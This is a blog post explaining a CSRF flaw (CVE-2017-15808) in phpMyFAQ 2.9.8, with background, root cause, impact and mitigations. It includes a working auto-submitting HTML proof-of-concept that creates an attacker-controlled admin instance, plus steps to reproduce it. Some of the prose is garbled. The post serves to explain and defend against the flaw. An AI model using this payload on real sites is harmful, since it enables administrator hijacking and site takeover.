• Posted by: Eng. Donya Bino
• December 18, 2025

phpMyFAQ CSRF Vulnerability Explained (CVE-2017-15808)

Cross-Site Request Forgery (CSRF) attacks are one of the most underrated web attacks, and this is even more common in legacy applications, particularly in PHP applications. The CSRF issue in phpMyFAQ 2.9.8, identified by CVE-2017-15808, enables malicious users to compel logged-on administrators to perform sensitive operations.

This case illustrates how a single improper security control can result in illicit configuration modification, unlawful instance development, and eventually complete adminLockSafer will gain complete admin privileges.

What Is CVE-2017-15808
This vulnerability refers to CVE-2017-15808 and is categorized as a Cross-Site Request Forgery issue in phpMyFAQ’s administrative interface. This correlates with the fact that phpMyFAQ does not validate admin requests properly to ensure they are actually what the logged-in admin.

Thus, it becomes possible for an attacker to form a malicious HTML page that performs privileged actions silently when accessed by a logged-in admin user.

Affected Version
1. Software: phpMyFAQ
2. Version: 2.9.8
3. Attack Type: Cross-Site Request Forgery (CSRF)
4. Authentication Required: Yes (victim must be logged in)

Why This Vulnerability Matters
Unlike direct exploits, CSRF attacks rely on user trust rather than technical complexity. If an admin is logged in and visits a malicious link, the browser automatically includes session cookies, making the request appear legitimate.

The potential benefits of exploiting this vulnerability include the following items:
1. The ability to create new or update existing instances of an application.
2. The ability to modify configuration values.
3. The ability to create administrative objects that are controlled by the attacker.
4. The ability to set the system up for additional compromises.
In the real-world, CSRF is typically combined with XSS, credential theft or malicious redirect cases.

Proof of Concept
The HTML code example below demonstrates how an attacker exploits this vulnerability. When this code is executed in the context of an authenticated phpMyFAQ administrator, the action will automatically happen.
<html>
  <body>
    <form action="http://phpmyfaq/admin/index.php" method="GET">
      <input type="hidden" name="action" value="ajax">
      <input type="hidden" name="ajax" value="config">
      <input type="hidden" name="ajaxaction" value="add_instance">
      <input type="hidden" name="url" value="malicious">
      <input type="hidden" name="instance" value="malicious_instance">
      <input type="hidden" name="comment" value="CSRF Test">
      <input type="hidden" name="email" value="attacker@example.com">
      <input type="hidden" name="admin" value="attacker">
      <input type="hidden" name="password" value="password123">
      <input type="submit" value="Submit request">
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

Steps to Reproduce
1. Store your PoC code as poc.html
2. Login as admin in phpMyFAQ
3. Open the PoC file in the same browser session
4. The unauthorized admin activity will be executed automatically
“No warnings. No confirmation. No user interaction.”

Root Cause Analysis  
Quick Reference
The vulnerability is present because:
1. There are no CSRF tokens implemented or verified
2. Call sensitive admin actions via GET requests
3. The application relies on browser cookies without origin validation
This is because it is very easy to take advantage

Security Impact
If exploited successfully, attackers can:
1. Change administrative settings
2. Malicious instance introduction
3. Escalate to further attacks on backend infrastructure

In an enterprise context, this may cause data leakage, service tampering, or lateral movement attacks.

Mitigation & Defense
From a CSRF attack, for example:
1. Protect all state-changing requests with CSRF tokens
2. Avoid GET requests for sensitive operations
3. Enforcement of Same
4. Origin and Referrer headers validation
5. Update to a fixed or more recent version of phpMyFAQ

The CSRF protection should be marked as required from a defensive point of view. “CVE-2017-15808” is a good reminder that “even very mature software can be affected by simple security mistakes.” CSRF vulnerabilities have nothing to do with zero-days or malicious payloads, it’s all about trust. If your app has an admin interface, you should assume that it will be attacked. Attackers already have.

Source: Exploit DB